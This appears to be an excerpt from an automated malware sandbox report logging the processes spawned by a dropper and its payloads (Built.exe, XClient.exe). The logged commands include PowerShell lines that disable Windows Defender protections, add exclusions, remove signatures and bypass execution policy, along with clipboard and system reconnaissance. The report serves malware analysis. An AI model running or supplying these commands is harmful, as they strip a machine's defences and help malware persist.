Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"			Jump to behavior

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
Source: C:\Brokercrt\comReviewsession.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5E8880 cpuid

1_2_00007FF76D5E8880

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

2_2_002AA63C

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformation	Jump to behavior
